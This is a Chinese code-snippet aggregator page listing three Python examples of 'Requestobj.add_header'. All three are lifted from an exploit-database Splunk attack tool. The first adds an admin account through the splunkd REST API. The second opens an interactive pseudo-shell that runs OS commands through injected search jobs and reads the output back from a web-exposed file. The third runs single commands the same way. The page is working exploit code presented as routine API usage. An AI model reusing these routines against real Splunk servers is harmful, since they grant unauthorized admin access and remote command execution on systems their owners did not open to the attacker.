当前位置: 首页>>代码示例>>Python>>正文


Python Requestobj.add_header方法代码示例

本文整理汇总了Python中sec1httplib.requestbuilder.Requestobj.add_header方法的典型用法代码示例。如果您正苦于以下问题:Python Requestobj.add_header方法的具体用法?Python Requestobj.add_header怎么用?Python Requestobj.add_header使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在sec1httplib.requestbuilder.Requestobj的用法示例。


在下文中一共展示了Requestobj.add_header方法的3个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: add_admin

# 需要导入模块: from sec1httplib.requestbuilder import Requestobj [as 别名]
# 或者: from sec1httplib.requestbuilder.Requestobj import add_header [as 别名]
    def add_admin(self,username,password,sessionKey):
        # look for 201
        if self.splunkd == 1 and self.username and self.password:
            url = Requestobj("{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url))
            url.basic_auth(self.username,self.password)
            url.rawpostdata("POST","roles=user&roles=admin&name={0}&defaultApp=search&password={1}&email=&createrole=0&realname=".format(username,password))
            url.add_header("authorization","Splunk {0}".format(sessionKey))
            result = url.makerequest()
            if str(result.code) == "201":
                return True
            else:
                return False

        else:
            print "[!] Not connected to splunkd. Check port and creds"
            return False
开发者ID:0x24bin,项目名称:exploit-database,代码行数:18,代码来源:18245.py

示例2: search_exploit_psudoshell

# 需要导入模块: from sec1httplib.requestbuilder import Requestobj [as 别名]
# 或者: from sec1httplib.requestbuilder.Requestobj import add_header [as 别名]
    def search_exploit_psudoshell(self):
        "Execute commands via search exploit. Payload implements a virtual shell"
        if not self.username or not self.password:
            print "[i] Valid username and password required"
            sys.exit()
        if not self.splunkweb == 1:
            print "[error] Managment Web Interface required for this payload"
            return ""
        
        if self.web_authed == 0:
            self.splunkweb_auth()

        base_dir = self.get_splunk_home()
        #if not base_dir:
        #    print "Failed to get splunk basedir"
        #    base_dir = "/opt/splunk"

        command=""
        while 1:
            print command.rstrip()
            command=raw_input("shell>")#
            if command.rstrip() == "exit": break

            if "windows" in self.os_name.lower():
                tmp = ">\"{0}\\share\splunk\search_mrsparkle\exposed\js\.tmp\"".format(base_dir)
                command = command + tmp #'"'+ tmp +'"'
            else:
                tmp = ">{0}/share/splunk/search_mrsparkle/exposed/js/.tmp".format(base_dir)
                command = command + tmp
            
            attack_body = self.search_payload_cmd(command)#

            attack_body = urllib.quote(urllib.unquote(attack_body))
            psudoshell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url))
            psudoshell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body))
            for c in psudoshell_req.get_cookiejar():
                if "session" in c.name:
                    psudoshell_req.add_header("X-Requested-With","XMLHttpRequest")
                    psudoshell_req.add_header("X-Splunk-Session",c.value)
            x = psudoshell_req.makerequest()
            import time
            time.sleep(3)
            print Requestobj("{0}/en-US/static/@105575/js/.tmp".format(self.splunkweb_url)).makerequest().body
开发者ID:0x24bin,项目名称:exploit-database,代码行数:45,代码来源:18245.py

示例3: search_exploit_cmd

# 需要导入模块: from sec1httplib.requestbuilder import Requestobj [as 别名]
# 或者: from sec1httplib.requestbuilder.Requestobj import add_header [as 别名]
    def search_exploit_cmd(self,command):
        "Execute commands via search exploit."

        if self.splunkweb == 1 and self.got_admin:
            if self.web_authed == 0:
                self.splunkweb_auth()
                
            print "[i] Executing Command:{0}".format(command)
            attack_body = self.search_payload_cmd(command)#
            attack_body = urllib.quote(urllib.unquote(attack_body))
            shell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url))
            shell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body))
            for c in shell_req.get_cookiejar():
                if "session" in c.name:
                    shell_req.add_header("X-Requested-With","XMLHttpRequest")
                    shell_req.add_header("X-Splunk-Session",c.value)
            x = shell_req.makerequest()

        elif self.splunkd == 1 and self.got_admin and self.session_key:

            print "[i] Executing Command:{0}".format(command)
            attack_body = self.search_payload_cmd(command)#
            attack_body = urllib.quote(urllib.unquote(attack_body))
            shell_req = Requestobj("{0}/servicesNS/admin/search/search/jobs".format(self.splunkd_url))
            shell_req.rawpostdata("POST","ui_dispatch_app=search&search={0}&required_field_list=%2A&ui_dispatch_view=flashtimeline&max_count=10000&time_format=%25s.%25Q&latest_time=&status_buckets=300&earliest_time=&auto_cancel=100".format(attack_body))
            shell_req.add_header("authorization","Splunk {0}".format(self.session_key))
            x = shell_req.makerequest()
        else:
            print "Session",self.session_key
            print "Admin",self.got_admin
            print "Splunkd",self.splunkd
            print "[i] Exploit failed. Not connected or access denied"
开发者ID:0x24bin,项目名称:exploit-database,代码行数:34,代码来源:18245.py


注:本文中的sec1httplib.requestbuilder.Requestobj.add_header方法示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。